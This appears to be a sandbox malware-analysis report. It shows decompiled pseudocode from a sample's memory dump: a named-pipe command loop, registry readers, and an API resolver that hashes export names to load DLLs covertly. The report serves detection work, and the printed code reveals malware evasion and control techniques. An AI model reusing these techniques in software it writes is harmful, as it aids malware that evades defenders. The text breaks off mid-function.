Function 000C32A1, Relevance: 6.2, APIs: 4, Instructions: 189
pipeCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E000C32A1() {
				char _v8;
				struct _OVERLAPPED* _v12;
				struct _OVERLAPPED* _v16;
				intOrPtr* _v20;
				char _v24;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr* _v40;
				char _v168;
				char _v172;
				intOrPtr _t41;
				void* _t47;
				char _t54;
				char _t61;
				intOrPtr _t64;
				void* _t65;
				void* _t68;
				void* _t70;
				void* _t72;
				void* _t76;
				struct _OVERLAPPED* _t82;
				intOrPtr* _t83;
				signed int _t84;
				signed short* _t86;
				intOrPtr* _t97;
				signed short* _t105;
				void* _t107;
				void* _t108;
				void* _t109;
				intOrPtr* _t112;
				struct _OVERLAPPED* _t113;
				char _t114;
				void* _t115;

				_t113 = 0;
				_t82 = 0;
				_v8 = 0;
				_v12 = 0;
				while(1) {
					_v16 = _t113;
					if(ConnectNamedPipe( *0xde674, _t113) == 0 && GetLastError() != 0x217) {
						break;
					}
					_push(_t113);
					_push( &_v16);
					_t41 =  *0xde684; // 0x27bf8f0
					_push(0x80000);
					_push( *0xde724);
					_push( *0xde674);
					if( *((intOrPtr*)(_t41 + 0x88))() == 0 || _v16 == 0) {
						GetLastError();
					} else {
						_t86 =  *0xde724; // 0x2b40020
						_t47 = ( *_t86 & 0x0000ffff) - 1;
						if(_t47 == 0) {
							_t112 = E000C93BE( &(_t86[4]), 0x20, 1,  &_v24);
							_v40 = _t112;
							if(_t112 != 0) {
								_t114 = _v24;
								if(_t114 <= 1) {
									_t113 = 0;
									_t54 = E000C1DA0(E000C9749( *_t112), 0, 0, 0);
									_t115 = _t115 + 0x10;
									_v172 = _t54;
								} else {
									_v36 = _t114 - 1;
									_t83 = E000C8604(_t114 - 1 << 2);
									_v32 = _t83;
									if(_t83 == 0) {
										_t113 = 0;
									} else {
										if(_t114 > 1) {
											_v20 = _t83;
											_t84 = 1;
											do {
												_t64 = E000C91A6( *((intOrPtr*)(_t112 + _t84 * 4)), E000CC379( *((intOrPtr*)(_t112 + _t84 * 4))));
												_t97 = _v20;
												_t84 = _t84 + 1;
												 *_t97 = _t64;
												_v20 = _t97 + 4;
											} while (_t84 < _t114);
											_t83 = _v32;
										}
										_t113 = 0;
										_t61 = E000C1DA0(E000C9749( *_t112), _t83, _v36, 0);
										_t115 = _t115 + 0x10;
										_v172 = _t61;
										E000C94B7( &_v24);
									}
									_t82 = _v12;
								}
							}
							_t105 =  *0xde724; // 0x2b40020
							E000C96CA( &_v168,  &(_t105[4]), 0x80);
							_push(0x84);
							_push( &_v172);
							_push(2);
							goto L33;
						} else {
							_t65 = _t47 - 3;
							if(_t65 == 0) {
								_push(_t113);
								_push(_t113);
								_t108 = 5;
								E000CC319(_t108);
								 *0xde758 = 1;
								_t82 = 1;
								_v12 = 1;
							} else {
								_t68 = _t65;
								if(_t68 == 0) {
									_t70 = E000CF79F( &_v8);
									goto L13;
								} else {
									_t72 = _t68 - 1;
									if(_t72 == 0) {
										E000CF79F( &_v8);
										goto L16;
									} else {
										_t76 = _t72 - 1;
										if(_t76 == 0) {
											_t70 = E000CF7C1( &_v8);
											L13:
											if(_t70 == 0) {
												_push(_t113);
												_push(_t113);
												_push(0xa);
											} else {
												_push(_v8);
												_push(_t70);
												_push(5);
											}
											_pop(_t109);
											E000CC319(_t109);
										} else {
											if(_t76 == 1) {
												E000CF7C1( &_v8);
												L16:
												_push(4);
												_push( &_v8);
												_push(5);
												L33:
												_pop(_t107);
												E000CC319(_t107);
												_t115 = _t115 + 0xc;
											}
										}
									}
								}
							}
						}
					}
					DisconnectNamedPipe( *0xde674);
					if(_t82 == 0) {
						continue;
					}
					break;
				}
				return 0;
			}

0x000c32ac
0x000c32ae
0x000c32b0
0x000c32b4
0x000c32b7
0x000c32c3
0x000c32ce
0x00000000
0x00000000
0x000c32e1
0x000c32e5
0x000c32e6
0x000c32eb
0x000c32f0
0x000c32f6
0x000c3304
0x000c34a8
0x000c3314
0x000c3314
0x000c331d
0x000c3320
0x000c33c8
0x000c33ca
0x000c33d1
0x000c33d7
0x000c33dd
0x000c3456
0x000c3461
0x000c3466
0x000c3469
0x000c33df
0x000c33e2
0x000c33ee
0x000c33f0
0x000c33f6
0x000c3471
0x000c33f8
0x000c33fd
0x000c33ff
0x000c3402
0x000c3404
0x000c3412
0x000c3417
0x000c341a
0x000c341b
0x000c3420
0x000c3423
0x000c3427
0x000c3427
0x000c342c
0x000c3439
0x000c343e
0x000c3441
0x000c344d
0x000c344d
0x000c3473
0x000c3473
0x000c33dd
0x000c3476
0x000c348a
0x000c348f
0x000c349a
0x000c349b
0x00000000
0x000c3326
0x000c3326
0x000c3329
0x000c3397
0x000c3398
0x000c339b
0x000c339c
0x000c33a3
0x000c33ae
0x000c33b0
0x000c332b
0x000c332c
0x000c332f
0x000c337f
0x00000000
0x000c3331
0x000c3331
0x000c3334
0x000c3369
0x00000000
0x000c3336
0x000c3336
0x000c3339
0x000c3353
0x000c3358
0x000c335b
0x000c3386
0x000c3387
0x000c3388
0x000c335d
0x000c335d
0x000c3360
0x000c3361
0x000c3361
0x000c338a
0x000c338b
0x000c333b
0x000c333e
0x000c3348
0x000c336e
0x000c336e
0x000c3373
0x000c3374
0x000c349d
0x000c349d
0x000c349e
0x000c34a3
0x000c34a3
0x000c333e
0x000c3339
0x000c3334
0x000c332f
0x000c3329
0x000c3320
0x000c34b4
0x000c34bc
0x00000000
0x00000000
0x00000000
0x000c34bc
0x000c34c8

APIs

ConnectNamedPipe.KERNELBASE(00000000), ref: 000C32C6
GetLastError.KERNEL32 ref: 000C32D0

Part of subcall function 000CC319: FlushFileBuffers.KERNEL32(000001E0), ref: 000CC35F

DisconnectNamedPipe.KERNEL32 ref: 000C34B4

Memory Dump Source

Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Yara matches

Similarity

API ID: NamedPipe$BuffersConnectDisconnectErrorFileFlushLast
String ID:
API String ID: 2389948835-0
Opcode ID: f186f2d00c7bfa6003295f32769de08b9a4e9688a4ea1a33c6e7d1db8d1624f1
Instruction ID: 58aa84d8eb2c3f5bebb521c1968008652298eb85fb782967e61da74a0d83595a
Opcode Fuzzy Hash: f186f2d00c7bfa6003295f32769de08b9a4e9688a4ea1a33c6e7d1db8d1624f1
Instruction Fuzzy Hash: EA512471A10205AFDB61EFA4DC89FEEBBB8EF05300F10812EF504A6152DB349B44CB60

Uniqueness

Uniqueness Score: -1.00%

Function 000CB012, Relevance: 6.1, APIs: 4, Instructions: 72
stringCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E000CB012(void* __ecx, WCHAR* __edx) {
				int _v8;
				void _v528;
				char _v1046;
				void _v1048;
				intOrPtr _t21;
				intOrPtr* _t26;
				void* _t27;
				intOrPtr _t33;
				intOrPtr _t36;
				void* _t39;
				intOrPtr _t40;
				WCHAR* _t47;
				void* _t49;

				_t39 = __ecx;
				_v8 = 0x104;
				_t47 = __edx;
				memset( &_v1048, 0, 0x208);
				memset( &_v528, 0, 0x208);
				_t21 =  *0xde698; // 0x27bfbc8
				 *((intOrPtr*)(_t21 + 4))(0, 0x1a, 0, 1,  &_v1048);
				_t49 = E000CB946(_t39);
				_t26 =  *0xde6b8; // 0x27bfbd8
				_t27 =  *_t26(_t49,  &_v528,  &_v8); // executed
				if(_t27 == 0) {
					_t33 =  *0xde688; // 0xf0000
					if(E000CBB8D( *((intOrPtr*)( *((intOrPtr*)(_t33 + 0x110))))) != 0) {
						_t36 =  *0xde698; // 0x27bfbc8
						 *((intOrPtr*)(_t36 + 4))(0, 0x24, 0, 1,  &_v528);
					}
				}
				_t40 =  *0xde684; // 0x27bf8f0
				 *((intOrPtr*)(_t40 + 0x30))(_t49);
				lstrcpynW(_t47,  &_v1046 + E000CC392( &_v528) * 2, 0x104);
				return 1;
			}

0x000cb012
0x000cb023
0x000cb035
0x000cb037
0x000cb045
0x000cb054
0x000cb05f
0x000cb067
0x000cb074
0x000cb07a
0x000cb07e
0x000cb080
0x000cb094
0x000cb09d
0x000cb0a8
0x000cb0a8
0x000cb094
0x000cb0ab
0x000cb0b2
0x000cb0d0
0x000cb0dd

APIs

memset.MSVCRT ref: 000CB037
memset.MSVCRT ref: 000CB045
SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000001,?,?,?,?,?,?,00000000), ref: 000CB05F

Part of subcall function 000CB946: GetCurrentThread.KERNEL32(00000008,00000000,10000000,00000000,?,?,000CBA7C,74EC17D9,10000000), ref: 000CB959
Part of subcall function 000CB946: GetLastError.KERNEL32(?,?,000CBA7C,74EC17D9,10000000), ref: 000CB967
Part of subcall function 000CB946: GetCurrentProcess.KERNEL32(00000008,10000000,?,?,000CBA7C,74EC17D9,10000000), ref: 000CB980

lstrcpynW.KERNEL32(?,?,00000104,?,?,?,?,?,00000000), ref: 000CB0D0

Memory Dump Source

Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Yara matches

Similarity

API ID: Currentmemset$ErrorFolderLastPathProcessThreadlstrcpyn
String ID:
API String ID: 3158470084-0
Opcode ID: cf666d5b425dfdb882d85405df432cbf1151db4e83984f2af2481bad33d39ac9
Instruction ID: 51dd89181f6f65cfcdbed33b84d5b23baa4a46682fef0b4f5f6547b1bf5b27aa
Opcode Fuzzy Hash: cf666d5b425dfdb882d85405df432cbf1151db4e83984f2af2481bad33d39ac9
Instruction Fuzzy Hash: 8C2196B1501218AFE710EB94DCC5EDB37BCEB58354F1040A5F605D7192D7749E458B70

Uniqueness

Uniqueness Score: -1.00%

Function 000CBF37, Relevance: 6.1, APIs: 4, Instructions: 72
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E000CBF37(short* __edx, short* _a4) {
				void* _v8;
				int _v12;
				int _v16;
				char* _v20;
				char* _t30;
				intOrPtr _t31;
				char* _t49;

				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				if(RegOpenKeyExW(0x80000002, __edx, 0, 0x20019,  &_v8) == 0) {
					if(RegQueryValueExW(_v8, _a4, 0,  &_v16, 0,  &_v12) != 0) {
						L6:
						if(_v8 != 0) {
							_t31 =  *0xde68c; // 0x27bfab8
							 *((intOrPtr*)(_t31 + 0x1c))(_v8);
						}
						_t30 = 0;
						L9:
						return _t30;
					}
					_t49 = E000C8604(_v12);
					_v20 = _t49;
					if(_t49 == 0) {
						goto L6;
					}
					if(RegQueryValueExW(_v8, _a4, 0, 0, _t49,  &_v12) == 0) {
						RegCloseKey(_v8);
						_t30 = _t49;
						goto L9;
					}
					E000C861A( &_v20, 0xfffffffe);
					goto L6;
				}
				return 0;
			}

0x000cbf55
0x000cbf58
0x000cbf5b
0x000cbf66
0x000cbf8a
0x000cbfc7
0x000cbfca
0x000cbfcc
0x000cbfd4
0x000cbfd4
0x000cbfd7
0x000cbfd9
0x00000000
0x000cbfd9
0x000cbf94
0x000cbf96
0x000cbf9c
0x00000000
0x00000000
0x000cbfb8
0x000cbfe5
0x000cbfe8
0x00000000
0x000cbfe8
0x000cbfc0
0x00000000
0x000cbfc6
0x00000000

APIs

RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020019,00000000,00000000,?,?,000C2C08,00000000), ref: 000CBF5E
RegQueryValueExW.KERNEL32(00000000,000C2C08,00000000,?,00000000,000C2C08,00000000,?,?,000C2C08,00000000), ref: 000CBF82
RegQueryValueExW.KERNEL32(00000000,000C2C08,00000000,00000000,00000000,000C2C08,?,?,000C2C08,00000000), ref: 000CBFB0
RegCloseKey.KERNEL32(00000000,?,?,000C2C08,00000000,?,?,?,?,?,?,?,000000AF,?), ref: 000CBFE5

Memory Dump Source

Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Yara matches

Similarity

API ID: QueryValue$CloseOpen
String ID:
API String ID: 1586453840-0
Opcode ID: 6ed20ac75d6ce2a2794a5c5300ff495a1a8a29f4fc73051a43656656db23271c
Instruction ID: 5287311d19161c5311007a090eb7e9ccf09f1a8ec080f3f080957cd4843ff4b4
Opcode Fuzzy Hash: 6ed20ac75d6ce2a2794a5c5300ff495a1a8a29f4fc73051a43656656db23271c
Instruction Fuzzy Hash: 9E210976900118FFDB10DFA5DC45E9EBBF8EF54740F1141AAB905E6261D7309A01DB60

Uniqueness

Uniqueness Score: -1.00%

Function 000CBE9B, Relevance: 6.1, APIs: 4, Instructions: 69
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E000CBE9B(void* __ecx, char* __edx, char* _a4, intOrPtr* _a12) {
				void* _v8;
				int _v12;
				int _v16;
				intOrPtr* _t43;
				char* _t46;

				_t46 = 0;
				_v8 = 0;
				_v16 = 0;
				if(RegOpenKeyExA(__ecx, __edx, 0, 0x20019,  &_v8) != 0) {
					return 0;
				}
				_v12 = 0;
				if(RegQueryValueExA(_v8, _a4, 0,  &_v16, 0,  &_v12) == 0) {
					_t46 = E000C8604(_v12 + 1);
					if(_t46 != 0 && RegQueryValueExA(_v8, _a4, 0,  &_v16, _t46,  &_v12) == 0) {
						_t43 = _a12;
						if(_t43 != 0) {
							 *_t43 = _v12;
						}
					}
				}
				if(_v8 != 0) {
					RegCloseKey(_v8);
				}
				return _t46;
			}

0x000cbeae
0x000cbeb8
0x000cbebb
0x000cbec3
0x00000000
0x000cbec5
0x000cbecc
0x000cbee6
0x000cbef2
0x000cbef7
0x000cbf15
0x000cbf1a
0x000cbf1f
0x000cbf1f
0x000cbf1a
0x000cbef7
0x000cbf24
0x000cbf2e
0x000cbf2e
0x00000000

APIs

RegOpenKeyExA.KERNEL32(?,00000000,00000000,00020019,?,027BFC18,00000000,?,00000002), ref: 000CBEBE
RegQueryValueExA.KERNEL32(?,00000002,00000000,?,00000000,00000002,?,00000002), ref: 000CBEE1
RegQueryValueExA.KERNEL32(?,00000002,00000000,?,00000000,00000002,?,00000002), ref: 000CBF0E
RegCloseKey.KERNEL32(?,?,00000002), ref: 000CBF2E

Memory Dump Source

Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Yara matches

Similarity

API ID: QueryValue$CloseOpen
String ID:
API String ID: 1586453840-0
Opcode ID: d02e406de60bbb37e370e22bde6ecbd53870ad3f0dddb35dbfbb7c6fd1738d1e
Instruction ID: 0a60d65e2cdd778546922eb2bef94615bab3b931e93d59a9e41fb967d6fdba14
Opcode Fuzzy Hash: d02e406de60bbb37e370e22bde6ecbd53870ad3f0dddb35dbfbb7c6fd1738d1e
Instruction Fuzzy Hash: 7221EAB5A01148BF9B60DFA9DC85EAEBBF8EF84740B0141AAB901D7220D730DA01DB61

Uniqueness

Uniqueness Score: -1.00%

Function 000CDFAD, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E000CDFAD(void* __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v92;
				intOrPtr _t41;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				void* _t56;
				struct HINSTANCE__* _t58;
				_Unknown_base(*)()* _t59;
				intOrPtr _t60;
				void* _t62;
				intOrPtr _t63;
				void* _t69;
				char _t70;
				void* _t75;
				CHAR* _t80;
				void* _t82;

				_t75 = __ecx;
				_v12 = __edx;
				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
				if(_t41 == 0) {
					L4:
					return 0;
				}
				_t62 = _t41 + __ecx;
				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_t63 =  *((intOrPtr*)(_t62 + 0x18));
				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
				_t47 = 0;
				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_v8 = 0;
				_v16 = _t63;
				if(_t63 == 0) {
					goto L4;
				} else {
					goto L2;
				}
				while(1) {
					L2:
					_t49 = E000CD400( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E000CC379( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
					_t51 = _v8;
					if((_t49 ^ 0x218fe95b) == _v12) {
						break;
					}
					_t73 = _v20;
					_t47 = _t51 + 1;
					_v8 = _t47;
					if(_t47 < _v16) {
						continue;
					}
					goto L4;
				}
				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
					return _t80;
				} else {
					_t56 = 0;
					while(1) {
						_t70 = _t80[_t56];
						if(_t70 == 0x2e || _t70 == 0) {
							break;
						}
						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
						_t56 = _t56 + 1;
						if(_t56 < 0x40) {
							continue;
						}
						break;
					}
					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
					 *((char*)(_t82 + _t56 - 0x54)) = 0;
					if( *((char*)(_t56 + _t80)) != 0) {
						_t80 =  &(( &(_t80[1]))[_t56]);
					}
					_t40 =  &_v92; // 0x6c6c642e
					_t58 = LoadLibraryA(_t40); // executed
					if(_t58 == 0) {
						goto L4;
					}
					_t59 = GetProcAddress(_t58, _t80);
					if(_t59 == 0) {
						goto L4;
					}
					return _t59;
				}
			}

0x000cdfb6
0x000cdfb8
0x000cdfbb
0x000cdfbe
0x000cdfc4
0x000ce021
0x00000000
0x000ce021
0x000cdfc6
0x000cdfd1
0x000cdfd4
0x000cdfd9
0x000cdfde
0x000cdfe1
0x000cdfe3
0x000cdfe6
0x000cdfe9
0x000cdfee
0x00000000
0x00000000
0x00000000
0x00000000
0x000cdff0
0x000cdff0
0x000ce002
0x000ce00f
0x000ce013
0x00000000
0x00000000
0x000ce015
0x000ce018
0x000ce019
0x000ce01f
0x00000000
0x00000000
0x00000000
0x000ce01f
0x000ce036
0x000ce03b
0x000ce03f
0x00000000
0x000ce04b
0x000ce04b
0x000ce04d
0x000ce04d
0x000ce053
0x00000000
0x00000000
0x000ce059
0x000ce05d
0x000ce061
0x00000000
0x00000000
0x00000000
0x000ce061
0x000ce067
0x000ce06f
0x000ce074
0x000ce077
0x000ce077
0x000ce079
0x000ce07d
0x000ce085
0x00000000
0x00000000
0x000ce089
0x000ce091
0x00000000
0x00000000
0x00000000
0x000ce091

APIs

LoadLibraryA.KERNEL32(.dll), ref: 000CE07D
GetProcAddress.KERNEL32(00000000,8DF08B59), ref: 000CE089

Strings

.dll, xrefs: 000CE079, 000CE07C

Memory Dump Source

Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: .dll
API String ID: 2574300362-2738580789
Opcode ID: 73480dcf04640b5668e538ebe0794b7acac3a1320454cbe5ad927de6f1f71708
Instruction ID: 5f9d211447d3819fd503f87bdcf7e534d45c92374d2040a9589af20f045a33b0
Opcode Fuzzy Hash: 73480dcf04640b5668e538ebe0794b7acac3a1320454cbe5ad927de6f1f71708
Instruction Fuzzy Hash: 6D31B231A001959BDB64CFA9C884BAEBBE5AF44304F38446ED905D7352DA74ED81CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 000C9B43, Relevance: 4.8, APIs: 3, Instructions: 254
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E000C9B43(char __ecx, int __edx, void* __fp0, int* _a4, int* _a8, int* _a12) {
				void* _v8;
				int _v12;
				void* _v16;
				void* _v20;
				int _v24;
				void* _v28;
				char _v32;
				char _v36;
				int* _v40;
				int** _v44;
				void _v108;
				int* _t90;
				void* _t91;
				char* _t92;
				long _t96;
				int* _t97;
				intOrPtr _t98;
				int* _t101;
				long _t111;
				int* _t112;
				intOrPtr _t122;
				char* _t125;
				intOrPtr _t126;
				intOrPtr _t128;
				int* _t129;
				intOrPtr _t131;
				int* _t133;
				intOrPtr _t134;
				int* _t135;
				intOrPtr _t136;
				char* _t139;
				int _t143;
				int _t147;
				intOrPtr _t148;
				int* _t149;
				int* _t154;
				int** _t155;
				int* _t161;
				int* _t163;
				intOrPtr _t164;
				intOrPtr _t171;
				int _t176;
				char* _t177;
				char* _t178;
				char _t179;
				void* _t180;
				void* _t181;
				void* _t183;

				_t176 = 0;
				_v24 = __edx;
				_t177 = 0;
				_v32 = __ecx;
				_v28 = 0;
				_v8 = 0x80000001;
				_v20 = 0;
				_t155 = E000C8604(0x110);
				_v44 = _t155;
				if(_t155 != 0) {
					_t158 = _a4;
					_t155[0x42] = _a4;
					E000CB5F6(_a4, __edx, __eflags, __fp0, _t158,  &_v108);
					_t161 = _v108;
					__eflags = _t161 - 0x61 - 0x19;
					_t90 = _t161;
					if(_t161 - 0x61 <= 0x19) {
						_t90 = _t90 - 0x20;
						__eflags = _t90;
					}
					_v108 = _t90;
					_t91 = E000C95C7(0x4d2);
					_t163 = _v24;
					_v16 = _t91;
					__eflags = _t163;
					if(_t163 == 0) {
						L16:
						_t164 =  *0xde688; // 0xf0000
						__eflags =  *((intOrPtr*)(_t164 + 0x214)) - 3;
						if( *((intOrPtr*)(_t164 + 0x214)) != 3) {
							_push(_t176);
							_push( &_v108);
							_push("\\");
							_t92 = E000C9292(_t91);
							_t181 = _t181 + 0x10;
							L20:
							_t177 = _t92;
							_v20 = _t177;
							goto L21;
						}
						_v24 = _t176;
						_v8 = 0x80000003;
						_t122 =  *0xde68c; // 0x27bfab8
						 *((intOrPtr*)(_t122 + 0x20))( *((intOrPtr*)( *((intOrPtr*)(_t164 + 0x110)))),  &_v24);
						__eflags = _v24 - _t177;
						if(_v24 == _t177) {
							goto L21;
						}
						_push(_t176);
						_push( &_v108);
						_t125 = "\\";
						_push(_t125);
						_push(_v16);
						_push(_t125);
						_t92 = E000C9292(_v24);
						_t181 = _t181 + 0x18;
						goto L20;
					} else {
						_t126 =  *0xde688; // 0xf0000
						_t128 =  *0xde68c; // 0x27bfab8
						_t129 =  *((intOrPtr*)(_t128 + 0x68))(_t163,  *((intOrPtr*)( *((intOrPtr*)(_t126 + 0x110)))));
						__eflags = _t129;
						if(_t129 != 0) {
							_t91 = _v16;
							goto L16;
						}
						_v12 = _t176;
						_t131 =  *0xde68c; // 0x27bfab8
						_v8 = 0x80000003;
						 *((intOrPtr*)(_t131 + 0x20))(_v24,  &_v12);
						__eflags = _v12 - _t177;
						if(_v12 == _t177) {
							L21:
							E000C85C2( &_v16);
							_t96 = RegOpenKeyExA(_v8, _t177, _t176, 0x20019,  &_v28);
							__eflags = _t96;
							if(_t96 == 0) {
								_t97 = _a8;
								__eflags = _t97;
								if(_t97 != 0) {
									 *_t97 = 1;
								}
								_push(_v28);
								L30:
								_t98 =  *0xde68c; // 0x27bfab8
								 *((intOrPtr*)(_t98 + 0x1c))();
								_t155[0x43] = _v8;
								_t101 = E000CC379(_t177);
								 *_t155 = _t101;
								__eflags = _t101;
								if(_t101 == 0) {
									L32:
									E000C861A( &_v20, 0xffffffff);
									return _t155;
								} else {
									goto L31;
								}
								do {
									L31:
									 *(_t155 + _t176 + 4) =  *(_t180 + (_t176 & 0x00000003) + 8) ^ _t177[_t176];
									_t176 = _t176 + 1;
									__eflags = _t176 -  *_t155;
								} while (_t176 <  *_t155);
								goto L32;
							}
							_v16 = _t176;
							_t111 = RegCreateKeyA(_v8, _t177,  &_v16);
							__eflags = _t111;
							if(_t111 == 0) {
								_t112 = _a8;
								__eflags = _t112;
								if(_t112 != 0) {
									 *_t112 = _t176;
								}
								_push(_v16);
								goto L30;
							}
							L23:
							E000C861A( &_v44, 0x110);
							memset( &_v108, _t176, 0x40);
							E000C861A( &_v20, 0xffffffff);
							goto L1;
						}
						_push(_t176);
						_push(_v16);
						_t178 = "\\";
						_push(_t178);
						_t133 = E000C9292(_v12);
						_t181 = _t181 + 0x10;
						_v40 = _t133;
						__eflags = _t133;
						if(_t133 == 0) {
							goto L23;
						}
						_t134 =  *0xde68c; // 0x27bfab8
						_t135 =  *((intOrPtr*)(_t134 + 0x14))(_v8, _t133, _t176, 0x20019,  &_v36);
						__eflags = _t135;
						if(_t135 == 0) {
							_t136 =  *0xde68c; // 0x27bfab8
							 *((intOrPtr*)(_t136 + 0x1c))(_v36);
						} else {
							_t143 = E000C95E1( &_v36, 0x34);
							_v24 = _t143;
							_t179 = E000C92E5(_v32);
							_v32 = _t179;
							E000C85D5( &_v24);
							_t183 = _t181 + 0x18;
							_t147 = E000C9256(_v12);
							_v24 = _t147;
							_t148 =  *0xde68c; // 0x27bfab8
							_t149 =  *((intOrPtr*)(_t148 + 0x30))(_v8, _t147, _t179, "\\", _t143, _t176);
							__eflags = _t149;
							if(_t149 == 0) {
								_t154 = _a12;
								__eflags = _t154;
								if(_t154 != 0) {
									 *_t154 = 1;
								}
							}
							E000C861A( &_v32, 0xfffffffe);
							E000C861A( &_v24, 0xfffffffe);
							_t181 = _t183 + 0x10;
							_t178 = "\\";
						}
						_t139 = E000C9292(_v12);
						_t171 =  *0xde684; // 0x27bf8f0
						_t181 = _t181 + 0x18;
						_t177 = _t139;
						_v20 = _t177;
						 *((intOrPtr*)(_t171 + 0x34))(_v12, _t178, _v16, _t178,  &_v108, _t176);
						E000C861A( &_v40, 0xffffffff);
						goto L21;
					}
				}
				L1:
				return 0;
			}

0x000c9b4c
0x000c9b4e
0x000c9b51
0x000c9b53
0x000c9b5b
0x000c9b5e
0x000c9b65
0x000c9b6d
0x000c9b6f
0x000c9b75
0x000c9b7e
0x000c9b86
0x000c9b8c
0x000c9b93
0x000c9b99
0x000c9b9b
0x000c9b9e
0x000c9ba0
0x000c9ba0
0x000c9ba0
0x000c9ba8
0x000c9bab
0x000c9bb0
0x000c9bb3
0x000c9bb6
0x000c9bb8
0x000c9cee
0x000c9cee
0x000c9cf4
0x000c9cfb
0x000c9d3c
0x000c9d40
0x000c9d41
0x000c9d47
0x000c9d4c
0x000c9d4f
0x000c9d4f
0x000c9d51
0x00000000
0x000c9d51
0x000c9d00
0x000c9d0a
0x000c9d13
0x000c9d18
0x000c9d1b
0x000c9d1e
0x00000000
0x00000000
0x000c9d20
0x000c9d24
0x000c9d25
0x000c9d2a
0x000c9d2b
0x000c9d2e
0x000c9d32
0x000c9d37
0x00000000
0x000c9bbe
0x000c9bbe
0x000c9bcb
0x000c9bd1
0x000c9bd4
0x000c9bd6
0x000c9ceb
0x00000000
0x000c9ceb
0x000c9bdf
0x000c9be3
0x000c9beb
0x000c9bf2
0x000c9bf5
0x000c9bf8
0x000c9d54
0x000c9d57
0x000c9d6f
0x000c9d72
0x000c9d74
0x000c9dc8
0x000c9dcb
0x000c9dcd
0x000c9dcf
0x000c9dcf
0x000c9dd5
0x000c9dd8
0x000c9dd8
0x000c9ddd
0x000c9de4
0x000c9dea
0x000c9def
0x000c9df2
0x000c9df4
0x000c9e0b
0x000c9e11
0x00000000
0x00000000
0x00000000
0x00000000
0x000c9df6
0x000c9df6
0x000c9e02
0x000c9e06
0x000c9e07
0x000c9e07
0x00000000
0x000c9df6
0x000c9d79
0x000c9d86
0x000c9d89
0x000c9d8b
0x000c9dba
0x000c9dbd
0x000c9dbf
0x000c9dc1
0x000c9dc1
0x000c9dc3
0x00000000
0x000c9dc3
0x000c9d8d
0x000c9d96
0x000c9da2
0x000c9dad
0x00000000
0x000c9db2
0x000c9bfe
0x000c9bff
0x000c9c02
0x000c9c07
0x000c9c0b
0x000c9c10
0x000c9c13
0x000c9c16
0x000c9c18
0x00000000
0x00000000
0x000c9c29
0x000c9c31
0x000c9c34
0x000c9c36
0x000c9cab
0x000c9cb3
0x000c9c38
0x000c9c3a
0x000c9c49
0x000c9c51
0x000c9c57
0x000c9c5a
0x000c9c62
0x000c9c65
0x000c9c6f
0x000c9c72
0x000c9c77
0x000c9c7a
0x000c9c7c
0x000c9c7e
0x000c9c81
0x000c9c83
0x000c9c85
0x000c9c85
0x000c9c83
0x000c9c91
0x000c9c9c
0x000c9ca1
0x000c9ca4
0x000c9ca4
0x000c9cc3
0x000c9cc8
0x000c9cce
0x000c9cd1
0x000c9cd3
0x000c9cd9
0x000c9ce2
0x00000000
0x000c9ce8
0x000c9bb8
0x000c9b77
0x00000000

Memory Dump Source

Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 8353e44af509d9735a0a927840699760167d5c64e14aba3f13b978e54da95b18
Instruction ID: d99cd1c3d9fcc3767b0c57ffbf3441cc8e1f37364192496a450fb361744b74f1
Opcode Fuzzy Hash: 8353e44af509d9735a0a927840699760167d5c64e14aba3f13b978e54da95b18
Instruction Fuzzy Hash: FB913CB1D00209AFDF10DF95CC89EEEBBB8EF18350F10416AF915AB292D7349A00CB61

Uniqueness

Uniqueness Score: -1.00%

Function 000CA0AB, Relevance: 4.6, APIs: 3, Instructions: 146
registryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E000CA0AB(signed int __ecx, char* __edx, void* __fp0, void* _a4, char _a8, char _a12) {
				char* _v12;
				char _v16;
				int _v20;
				signed int _v24;
				intOrPtr _v28;
				char* _v32;
				char _v52;
				char _v64;
				char _v328;
				char _v2832;
				signed int _t48;
				signed int _t49;
				char* _t54;
				long _t73;
				long _t80;
				long _t83;
